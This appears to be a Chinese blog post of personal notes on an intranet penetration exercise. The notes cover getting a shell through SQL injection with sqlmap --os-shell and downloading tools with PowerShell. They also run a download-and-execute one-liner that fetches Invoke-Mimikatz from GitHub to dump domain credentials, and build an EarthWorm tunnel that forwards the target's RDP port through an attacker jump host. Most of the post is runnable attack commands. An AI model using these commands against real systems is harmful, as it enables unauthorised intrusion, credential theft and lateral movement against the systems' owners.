内网渗透笔记

读万卷书不如行万里路,之前对网上的内网渗透的博客,一知半解,今天终于体验了一回。
因为自己不是主力,所以对有些过程,还不清楚,利用此博客,把今天学到的记录下来,作为笔记。

切入点

目标网站存在sql 注入

  • 利用sqlmap -u "url" --os-shell 进入该网站的cmd界面。
  • 利用powershell上传工具。
    由于进入的服务为 windows 8版本,没有powershell,所以可以采用 将可在powershell运行的命令前加 powershell
  • 比如 在powershell 中,下载文件的命令为:
    (1) $client = new-object System.Net.WebClient
    (2) $client.DownloadFile('#1', '#2')
    #1是需要下载文件的url
    #2是保存为本地文件的路径,包括文件名.
  • 在cmd 中要实现此功能则应输入:
    (1) powershell $client = new-object System.Net.WebClient
    (2) powershell $client.DownloadFile('#1', '#2')
  • 或者使用powershell echo 一行一行的写入,这个步骤我不是很清楚,后续补上。
  • 将转发端口所需要的工具传到进入的服务器主机中,本来想在该服务器上找到网站所在目录,传webshell但是找了很久都没找到,后面才发现,该服务器为数据库服务器,网站放在另一个服务器。

查看登录密码

  • 在进入的cmd 环境中输入:powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" 即可看到服务管理员所属的域及对应主机登录密码

利用跳板机登录靶机

由于已经上传了工具到靶机,利用自己的一台服务器作为跳板机。
假设我们的服务器IP为:IP1 ,靶机的IP:IP2

  • 在跳板机上cmd 中输入命令:ew_for_Win.exe -s lcx_listen -l 1080 -e 1234 ew_for_Win.exe为我们上传的工具,该命令的意思为: 监听1234端口的流量,并将该端口的流量转发到 本机1080端口上。
  • 在靶机的cmd中输入命令:ew_for_Win.exe -s lcx_slave -d IP1 -e 1234 -f IP2 -g 3389
    该命令的意思为:将靶机3389(远程桌面连接)的流量转发到1234端口。
注意这台数据库服务器,既可以访问外网又可以访问内网。

经过这两步操作后,靶机远程桌面3389的流量就映射到跳板机的1080端口上,在跳板机上cmd中输入mstsc ,进入远程连接,输入:IP1:1080即可连接上靶机,输入前面获得的用户名,密码即可成功登录到靶机。

参考博客

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值